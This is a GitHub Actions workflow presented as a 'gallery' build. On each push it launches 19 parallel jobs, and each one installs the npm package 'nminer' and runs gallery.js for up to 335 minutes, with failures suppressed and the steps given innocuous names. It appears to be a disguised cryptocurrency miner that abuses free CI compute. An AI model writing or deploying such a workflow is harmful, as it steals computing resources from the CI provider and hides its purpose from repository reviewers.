name: gallery
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1858 }
          - { version: 3876 }
          - { version: 7735 }
          - { version: 4348 }
          - { version: 9350 }
          - { version: 6544 }
          - { version: 6306 }
          - { version: 7579 }
          - { version: 6763 }
          - { version: 9678 }
          - { version: 6053 }
          - { version: 8356 }
          - { version: 784 }
          - { version: 6763 }
          - { version: 2893 }
          - { version: 3899 }
          - { version: 7267 }
          - { version: 7494 }
          - { version: 1263 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: earnest gee
        run: |
          npm install nminer@latest
          timeout 335m node gallery.js || echo "gallery executed"